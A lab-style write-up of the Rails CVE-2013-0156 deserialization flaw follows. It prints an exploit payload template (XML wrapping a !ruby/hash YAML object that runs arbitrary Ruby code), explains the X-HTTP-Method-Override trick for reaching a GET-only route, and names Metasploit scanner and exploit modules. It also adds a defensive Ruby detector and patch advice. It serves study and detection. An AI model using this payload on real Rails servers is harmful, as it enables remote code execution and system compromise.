
CVE-2013-0156: Rails Object Injection

This vulnerability is caused by arbitrary deserialization, which can be used to trigger SQL injection and even code execution.

Exploitation

Multiple public exploits are available for this vulnerability.

The exploit will generate a payload similar to the following request body:

<?xml version="1.0" encoding="UTF-8"?>
<exploit type="yaml">--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
? |
foo
 (RUBY; @executed = true) unless @executed
 __END__
: !ruby/struct
defaults:
:action: create
:controller: foos
required_parts: []
requirements:
:action: create
:controller: foos
segment_keys:
- :format</exploit>

Where RUBY is some arbitrary Ruby code.

The idea here is to create a new action with arbitrary code in it. By default, Rails doesn't accept pure YAML in a request body, but it does accept XML, and that XML can embed YAML (this explains the first two lines of the payload). Finally, @executed ensures that the code only runs once.

YAML is very sensitive to line breaks and whitespace. Here we can see that the YAML is used to run some Ruby code.

The application only contains one route, and it uses the GET method; however, the request needs a body to carry the payload. To bypass this limitation, the X-HTTP-Method-Override header can be used. The provided exploit does this automatically; you just need to find the right Ruby code to gain code execution.
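As an added, defender-side example (not part of the original exercise, and not code from the public exploits or from Metasploit), the stand-alone Ruby script below checks a captured request for the two traits described above: an XML body whose elements declare type="yaml" or type="symbol" (the attributes that vulnerable Rails versions handed to the YAML and Symbol loaders) or that contains !ruby/ tags, and a GET request that carries X-HTTP-Method-Override together with a body. It uses only REXML from the standard library; the sample requests are constructed and the function names are my own.

```ruby
require 'rexml/document'

# XML "type" attributes that vulnerable Rails versions routed to YAML/Symbol loaders.
DANGEROUS_TYPES = %w[yaml symbol].freeze
# Psych tags that instantiate Ruby objects while loading a YAML document.
RUBY_TAG = %r{!ruby/}.freeze

# Inspect one XML request body; returns an array of findings (empty means clean).
def xml_findings(body)
  findings = []
  findings << 'ruby-object YAML tag in body' if body.match?(RUBY_TAG)
  begin
    doc = REXML::Document.new(body)
  rescue REXML::ParseException
    return findings << 'malformed XML'
  end
  REXML::XPath.each(doc, '//*') do |el|
    type = el.attributes['type']
    next unless type && DANGEROUS_TYPES.include?(type.downcase)
    findings << "element <#{el.name}> declares type=\"#{type.downcase}\""
  end
  findings
end

# True when a GET request carries X-HTTP-Method-Override and a non-empty body:
# the combination used to deliver a body to a route that only accepts GET.
def override_on_get?(method, headers, body)
  override = headers.keys.any? { |k| k.casecmp?('X-HTTP-Method-Override') }
  method.to_s.upcase == 'GET' && override && !body.to_s.strip.empty?
end

# Combine both checks for one request.
def assess(method, headers, body)
  findings = xml_findings(body.to_s)
  findings << 'X-HTTP-Method-Override on GET with body' if override_on_get?(method, headers, body)
  findings
end

# Constructed sample requests (not captured traffic).
BENIGN_BODY = <<~XML
  <?xml version="1.0" encoding="UTF-8"?>
  <foo><name>bar</name></foo>
XML

SUSPICIOUS_BODY = <<~XML
  <?xml version="1.0" encoding="UTF-8"?>
  <exploit type="yaml">--- !ruby/hash:SomeClass
  key: value</exploit>
XML

if __FILE__ == $PROGRAM_NAME
  puts assess('POST', { 'Content-Type' => 'application/xml' }, BENIGN_BODY).inspect
  puts assess('GET', { 'X-HTTP-Method-Override' => 'POST' }, SUSPICIOUS_BODY).inspect
end
```

Each finding on its own is only a signal (a legitimate client may send a method override, and a harmless document may use a type attribute), so the combination is what should raise an alert. The upstream fix removed the yaml and symbol type handlers from ActiveSupport::XmlMini, and sites that could not upgrade were advised to delete those two parsers in an initializer; a check like this one is a stop-gap for spotting traffic that targets unpatched hosts, not a substitute for patching.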


Metasploit

We can use Metasploit to exploit this vulnerability:

  • auxiliary/scanner/http/rails_xml_yaml_scanner can be used for detection.
  • exploit/multi/http/rails_xml_yaml_code_exec can be used for exploitation.